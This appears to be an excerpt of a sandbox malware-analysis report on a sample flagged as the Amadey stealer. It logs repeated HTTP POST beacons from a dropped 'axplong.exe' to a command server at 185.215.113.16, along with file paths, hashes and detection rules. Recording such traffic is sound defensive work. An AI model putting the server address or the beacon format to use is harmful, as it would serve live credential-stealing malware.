                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              89192.168.2.651173185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:38.205142021 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 21:00:38.960272074 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:38 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              90192.168.2.651174185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:38.970710039 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 21:00:40.467555046 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:39 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0
                              Jul 26, 2024 21:00:40.467659950 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:39 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0
                              Jul 26, 2024 21:00:40.468456030 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:39 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              91192.168.2.651175185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:40.588011980 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 21:00:41.662581921 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:41 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              92192.168.2.651176185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:41.672707081 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 21:00:42.550302982 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:42 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              93192.168.2.651177185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:42.668124914 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 21:00:43.425728083 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:43 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              94192.168.2.651178185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:43.434999943 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              95192.168.2.651179185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:44.279313087 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 21:00:45.053205013 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:44 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              96192.168.2.651180185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:45.061975002 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 21:00:45.833709955 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:45 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              97192.168.2.651181185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:45.946856022 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 21:00:47.451484919 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:46 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 21:00:47.452342033 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:46 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0
                              Jul 26, 2024 21:00:47.452452898 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:46 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              98192.168.2.651182185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:47.460967064 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 21:00:48.437192917 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:48 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              99192.168.2.651183185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:48.556248903 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 21:00:49.359194040 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:49 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              100192.168.2.651184185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:49.371691942 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 21:00:50.211755037 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:50 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              101192.168.2.651185185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:50.327857018 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 21:00:51.134630919 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:50 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              102192.168.2.651186185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:51.145494938 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 21:00:51.908798933 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:51 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              103192.168.2.651187185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:52.024971008 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 21:00:52.828098059 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:52 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              104192.168.2.651188185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:52.838639975 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 21:00:53.604022980 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:53 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              105192.168.2.651189185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:53.728637934 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 21:00:54.485096931 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:54 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              106192.168.2.651190185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:54.498294115 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 160
                              Cache-Control: no-cache
                              Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                              Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                              Jul 26, 2024 21:00:55.251640081 CEST196INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:55 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 7 <c><d>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              107192.168.2.651191185.215.113.16807036C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              TimestampBytes transferredDirectionData
                              Jul 26, 2024 21:00:55.369916916 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              Host: 185.215.113.16
                              Content-Length: 4
                              Cache-Control: no-cache
                              Data Raw: 73 74 3d 73
                              Data Ascii: st=s
                              Jul 26, 2024 21:00:56.157407045 CEST219INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Fri, 26 Jul 2024 19:00:56 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Refresh: 0; url = Login.php
                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 1 0


                              Click to jump to process

                              Click to jump to process

                              Click to dive into process behavior distribution

                              Click to jump to process

                              Target ID:0
                              Start time:14:58:50
                              Start date:26/07/2024
                              Path:C:\Users\user\Desktop\setup.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\setup.exe"
                              Imagebase:0x190000
                              File size:1'933'312 bytes
                              MD5 hash:2A846C38FB95E0103773296F7E7794EB
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2128912313.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.2088563271.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              Target ID:2
                              Start time:14:58:52
                              Start date:26/07/2024
                              Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                              Imagebase:0x500000
                              File size:1'933'312 bytes
                              MD5 hash:2A846C38FB95E0103773296F7E7794EB
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2157568519.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2116812942.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              Antivirus matches:
                              • Detection: 100%, Avira
                              • Detection: 100%, Joe Sandbox ML
                              Reputation:low
                              Has exited:true

                              Target ID:3
                              Start time:14:58:54
                              Start date:26/07/2024
                              Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              Imagebase:0x500000
                              File size:1'933'312 bytes
                              MD5 hash:2A846C38FB95E0103773296F7E7794EB
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.2126010864.0000000004AB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.2166411163.0000000000501000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              Target ID:4
                              Start time:14:59:00
                              Start date:26/07/2024
                              Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                              Imagebase:0x500000
                              File size:1'933'312 bytes
                              MD5 hash:2A846C38FB95E0103773296F7E7794EB
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
